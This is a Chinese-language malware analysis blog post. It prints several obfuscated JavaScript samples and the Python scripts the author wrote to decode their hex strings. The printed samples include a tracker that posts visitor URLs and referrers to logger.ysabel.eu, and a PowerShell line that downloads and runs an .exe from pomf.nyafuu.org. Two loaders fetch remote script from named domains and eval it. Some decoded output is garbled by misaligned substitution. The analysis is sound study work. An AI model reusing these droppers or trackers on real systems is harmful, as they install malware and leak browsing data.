Virus_JS3_PyAnalysisAndSummary
来源:互联网 发布:家里有网络怎么看电视 编辑:程序博客网 时间:2024/06/16 12:55
本篇是对JS样本做的简单分析第三篇,有点重复的意思,当巩固吧.
0x1 Sample(TotalSamp_myself\Js–166x–63)
var _0x586f=["\x76\x61\x6C\x75\x65","\x78\x4B\x65\x79\x78","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x55\x52\x4C","\x26","\x26\x61\x6D\x70\x3B","\x72\x65\x70\x6C\x61\x63\x65","\x6B","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x65\x72\x72","\x50\x4F\x53\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6F\x67\x67\x65\x72\x2E\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x4C\x6F\x67\x67\x65\x72\x2E\x61\x73\x6D\x78","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x74\x65\x78\x74\x2F\x78\x6D\x6C","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D\x38\x22\x20\x3F\x3E","\x3C\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x69\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x2D\x69\x6E\x73\x74\x61\x6E\x63\x65\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x64\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x73\x6F\x61\x70\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x78\x6D\x6C\x73\x6F\x61\x70\x2E\x6F\x72\x67\x2F\x73\x6F\x61\x70\x2F\x65\x6E\x76\x65\x6C\x6F\x70\x65\x2F\x22\x3E","\x3C\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x4C\x6F\x67\x44\x61\x74\x61\x20\x78\x6D\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x22\x3E","\x3C\x6B\x3E","\x3C\x2F\x6B\x3E","\x3C\x75\x72\x6C\x3E","\x64\x6F\x6D\x61\x69\x6E","\x3C\x2F\x75\x72\x6C\x3E","\x3C\x65\x76\x3E","\x3C\x2F\x65\x76\x3E","\x3C\x2F\x4C\x6F\x67\x44\x61\x74\x61\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x3E","\x73\x65\x6E\x64","","\x22\x2C","\x22","\x44\x4F\x4D\x50\x61\x72\x73\x65\x72","\x70\x61\x72\x73\x65\x46\x72\x6F\x6D\x53\x74\x72\x69\x6E\x67","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x44\x4F\x4D","\x61\x73\x79\x6E\x63","\x6C\x6F\x61\x64\x58\x4D\x4C","\x6E\x6F\x64\x65\x56\x61\x6C\x75\x65","\x63\x68\x69\x6C\x64\x4E\x6F\x64\x65\x73","\x4C\x6F\x67\x44\x61\x74\x61\x52\x65\x73\x75\x6C\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x20\x6E\x6F\x74\x20\x73\x75\x70\x70\x6F\x72\x74\x65\x64"];var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];var visitorData= new visitorData(k);function visitorData(_0xf4c7x3){this[_0x586f[3]]=document[_0x586f[3]][_0x586f[6]](_0x586f[4],_0x586f[5]);this[_0x586f[7]]=_0xf4c7x3;try{this[_0x586f[8]]=top[_0x586f[9]][_0x586f[8]][_0x586f[6]](_0x586f[4],_0x586f[5]);} catch(err){this[_0x586f[8]]=_0x586f[10];} ;var _0xf4c7x4=CreateXMLHttpRequest();_0xf4c7x4[_0x586f[13]](_0x586f[11],_0x586f[12],true);_0xf4c7x4[_0x586f[16]](_0x586f[14],_0x586f[15]);var _0xf4c7x5=_0x586f[17]+_0x586f[18]+_0x586f[19]+_0x586f[20]+_0x586f[21]+_0xf4c7x3+_0x586f[22]+_0x586f[23]+document[_0x586f[24]]+_0x586f[25]+_0x586f[26]+objToString(this)+_0x586f[27]+_0x586f[28]+_0x586f[29]+_0x586f[30];_0xf4c7x4[_0x586f[31]](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8=_0x586f[32];try{_0xf4c7x8+=_0xf4c7x7[_0x586f[3]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[7]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[8]].toString()+_0x586f[33];} catch(err){_0xf4c7x8=_0xf4c7x7[_0x586f[3]].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window[_0x586f[35]]){parser= new DOMParser();xmlDoc=parser[_0x586f[36]](_0xf4c7xa,_0x586f[15]);} else {xmlDoc= new ActiveXObject(_0x586f[37]);xmlDoc[_0x586f[38]]=false;xmlDoc[_0x586f[39]](_0xf4c7xa);} ;return xmlDoc[_0x586f[43]](_0x586f[42])[0][_0x586f[41]][0][_0x586f[40]];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!=_0x586f[44]){return new XMLHttpRequest();} else {if( typeof ActiveXObject!=_0x586f[44]){return new ActiveXObject(_0x586f[45]);} else {throw new Error(_0x586f[46]);} ;} ;} ;
0x2 py脚本
#!/usr/bin/env python3# -*- coding: utf-8 -*-' a test module ahoo'__author__ = 'ahoo'import sysimport ioimport osimport codecsimport reimport shutilPutPath = '063.JS.vir' #JsVirus文件OutPath = '63_analysis.txt' #提取到的文件myJslog = []AuthorSign = Truesys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码 def ReadLogFile(InPath,ReadTye = 'r'): logall = [] #print(InPath) if os.path.exists(InPath): f = codecs.open(InPath,ReadTye,'utf-8') #读入到list for line in f: if None == line: pass else: logall.append(line) f.close() return logalldef WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'): #后面可能改成词典 #if os.path.exists(InPath): # pass #else: #要用全局变量把这里变成只写一次吗 global AuthorSign f = codecs.open(OutRePath,WriteTye,'utf-8') if AuthorSign == True: f.write('\n*****************************************************\r\n') f.write('* ahoo JsVirusAnalysis ') f.write('\n***************************************************\r\n\n') AuthorSign = False for i in findRe: f.write(i + '\n') f.close() return Truedef JSVirus_Parse(): #1.读取文件到LineList myJslog = ReadLogFile(PutPath) #print(myJslog) writeList_temp = [] writeList = [] #2.分为两部分处理. f586List = [] pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))') for line in myJslog: if '_0x586f=["' in line: #2.1 替换16进制-- for i in pattern_ascii.findall(line): #方法1 #line = line.replace(i[0], chr(int(i[1],16))) #方法2 pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])') line = pattern_temp.sub(chr(int(i[1],16)),line,count =1) print(line) writeList.append(line) #2.2 分割为数组 #line13 = 'var _0x586f=["value","xKeyx","getElementById","URL","&","&"];' #re.match(r"\[(.*)\]",line13[12:]).group(1) f586List = re.match(r"\[(.*)\]",line[12:]).group(1).split(',') print(f586List) else: writeList_temp.append(line) #3.替换数组 #3.1查找所有数组 ''' for test line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];" print(line11) pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])') for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line11): index = int(arrary) repStr = "*haha*" line11 = pattern_arrary.sub(repStr,line11,count=1) print(line11) ''' for line in writeList_temp: pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])') for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line): index = int(arrary) repStr = f586List[index] line = pattern_arrary.sub(repStr,line,count=1) #3.2替换分割的字符串+ plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') line = plus.sub('',line) writeList.append(line) #4 写入并打开文件 WriteResultFile(OutPath,writeList) os.system('notepad.exe ' + OutPath) print('The Virus has been analyzed,there is my advice! Thanks!') return Trueif __name__ == '__main__': JSVirus_Parse()
0x3 输出结果
做过美容的.var _0x586f=["value","xKeyx","getElementById","URL","&","&","replace","k","referrer","document","err","POST","http://logger.ysabel.eu/Logger.asmx","open","Content-Type","text/xml","setRequestHeader","<?xml version="1.0" encoding="utf-8" ?>","<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">","<soap:Body>","<LogData xmlns="http://ysabel.eu/">","<k>","</k>","<url>","domain","</url>","<ev>","</ev>","</LogData>","</soap:Body>","</soap:Envelope>","send","","",",""","DOMParser","parseFromString","Microsoft.XMLDOM","async","loadXML","nodeValue","childNodes","LogDataResult","getElementsByTagName","undefined","Microsoft.XMLHTTP","XMLHttpRequest not supported"];var k = document["getElementById"]("xKeyx")["value"];var visitorData = new visitorData(k);function visitorData(_0xf4c7x3) { this["URL"] = document["URL"]["replace"]("&", "&"); this["k"] = _0xf4c7x3; try { this["referrer"] = top["document"]["referrer"]["replace"]("&", "&"); } catch (err) { this["referrer"] = "err"; }; var _0xf4c7x4 = CreateXMLHttpRequest(); _0xf4c7x4["open"]("POST", "http://logger.ysabel.eu/Logger.asmx", true); _0xf4c7x4["setRequestHeader"]("Content-Type", "text/xml"); var _0xf4c7x5 = "<?xml version=" 1.0 " encoding="utf - 8 " ?><soap:Envelope xmlns:xsi="http: //www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/<soap:Body><LogData xmlns="http://ysabel.eu/<k>"+_0xf4c7x3+"</k><url>"+document["domain</url><ev>"+objToString(this)+"</ev></LogData></soap:Body></soap:Envelope>";_0xf4c7x4["send"](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8="";try{_0xf4c7x8+=_0xf4c7x7["URL"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["k"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["referrer"].toString()+"";} catch(err){_0xf4c7x8=_0xf4c7x7["URL"].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window["""]){parser= new DOMParser();xmlDoc=parser["DOMParser"](_0xf4c7xa,"text/xml");} else {xmlDoc= new ActiveXObject("parseFromString");xmlDoc["Microsoft.XMLDOM"]=false;xmlDoc["async"](_0xf4c7xa);} ;return xmlDoc["LogDataResult"]("childNodes")[0]["nodeValue"][0]["loadXML"];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!="getElementsByTagName"){return new XMLHttpRequest();} else {if( typeof ActiveXObject!="getElementsByTagName"){return new ActiveXObject("undefined");} else {throw new Error("Microsoft.XMLHTTP");} ;} ;} ;
0x4 注意
[1]生成代码后做个美容(格式化)http://www.css88.com/tool/js_beautify/[2]正则测试工具(F:\RegTestTool.exe)
0x5下面做点扩充吧,js的都往后续…
0x5.1 Num25
var d=new ActiveXObject('Shell.TrimiApplication'.replace('Trimi',''));d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('http://pomf.nyafuu.org/files/hekycc.exe','hajdebabuchajde.pif');Start-Process 'hajdebabuchajde.pif'","","",0);
0x5.2 Num41
var m = "rZJ-8RCo-l6L4KpmDDYk-Djc_A3rIzZDBY0MtnHpZMggmgBiXlxzsG70G_17kBhVkZlNn9wUQQ0"; var x = new Array("jaysonandfrisby.com","romiecoston.com"); var z1 = "Msxml2.XMLHTTP"; var z4 = "a"; for (var i=0; i<2; i++) { var e = new ActiveXObject(z1); try { e.open("GET", "http://"+x[i]+"/counter/?"+m, false); e.send(); if (e.status == 200) { var z3 = e.responseText; var z3 = z3.split(m); var z3 = z3.join(z4); eval(z3); break; } ; } catch(e) { }; };
0x5.3 Num29
0x5.3.1样本
var random=function(){return Math.random()}; try{ var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50"); objHttp.Open("\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x6C\x2D\x70\x68\x64\x7A\x6D\x66\x6A\x68\x2E\x6E\x6C\x2F\x70\x32\x65\x2E\x6A\x73\x3F"+ random(),false); objHttp.Send();if(objHttp.Status== 200){ eval(objHttp.responseText+ "\x64\x6F\x77\x6E\x41\x6E\x64\x45\x78\x65\x63\x28\x22\x70\x67\x36\x76\x22\x29\x3B")} } catch(e){}
0x5.3.2Py代码
#!/usr/bin/env python3# -*- coding: utf-8 -*-' a test module ahoo'__author__ = 'ahoo'import sysimport ioimport osimport codecsimport reimport shutilPutPath = '029.JS.vir' OutPath = '29_analysis.txt' #提取到的文件.myJslog = []AuthorSign = Truesys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码 def ReadLogFile(InPath,ReadTye = 'r'): logall = [] #print(InPath) if os.path.exists(InPath): f = codecs.open(InPath,ReadTye,'utf-8') #读入到list for line in f: if None == line: pass else: logall.append(line) f.close() return logalldef WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'): #后面可能改成词典 #if os.path.exists(InPath): # pass #else: #要用全局变量把这里变成只写一次吗 global AuthorSign f = codecs.open(OutRePath,WriteTye,'utf-8') if AuthorSign == True: f.write('\n*****************************************************\r\n') f.write('* ahoo JsVirusAnalysis ') f.write('\n***************************************************\r\n\n') AuthorSign = False for i in findRe: f.write(i + '\n') f.close() return Truedef JSVirus_Parse(): #1.读取文件到LineList myJslog = ReadLogFile(PutPath) #print(myJslog) writeList = [] pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))') for line in myJslog: for i in pattern_ascii.findall(line): #方法1 #line = line.replace(i[0], chr(int(i[1],16))) #方法2 pattern_tem = re.compile(r'(\\x[0-9][a-zA-Z0-9])') line = pattern_tem.sub(chr(int(i[1],16)),line,count =1) print(line) writeList.append(line) #4 写入并打开文件 WriteResultFile(OutPath,writeList) os.system('notepad.exe ' + OutPath) print('The Virus has been analyzed,there is my advice! Thanks!') return Trueif __name__ == '__main__': JSVirus_Parse()
0x5.3.3输出
****************************************************** ahoo JsVirusAnalysis ***************************************************var random=function(){ return Math.random()};try{ var objHttp=WScript.CreateObject("MSXML2.XMLHTTP"); objHttp.Open("GET","https://dl-phdzmfjh.nl/p2e.js?"+ random(),false); objHttp.Send();if(objHttp.Status== 200){ eval(objHttp.responseText+ "downAndExec("pg6v");")}}catch(e){}
0x6 小结
强调一点:复杂的看不懂的先美化,就好找规律多了
【调试】js/vbs(默认调试器vs2013):cmd:WScript.exe /x name.js/vbs【调试】JS(od-找downhttp):OD载入wscript.exe,调试->参数(jsPaht),ctrl+F2,bp UrlCanonicalizeA/W,F9.【调试】正则工具: F:\RegTestTool.exe【代码美化-VB】(http://tools.jb51.net/code/vbscodeformat)【代码美化-JS】http://www.css88.com/tool/js_beautify/【VB关键字】executeglobal(str) EXECUTE(str)【写入法核心】set fso = CreateObject("Scripting.FileSystemObject"):set f = fso.CreateTextFile("C:\VbsVirLog.txt", true):f.Write(str)【正则】1.替换"+": plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') ;line = plus.sub('',line) 2.替换某一行中的所有符合条件 ''' for test line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];" print(line11) pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])') for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line11): index = int(arrary) repStr = "*haha*" line11 = pattern_arrary.sub(repStr,line11,count=1) print(line11) ''' 3.替换\0x56为char ''' line = 'var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");' pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))') for i in pattern_ascii.findall(line): #方法1 #line = line.replace(i[0], chr(int(i[1],16))) #方法2 pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])') line = pattern_temp.sub(chr(int(i[1],16)),line,count =1) print(line) '''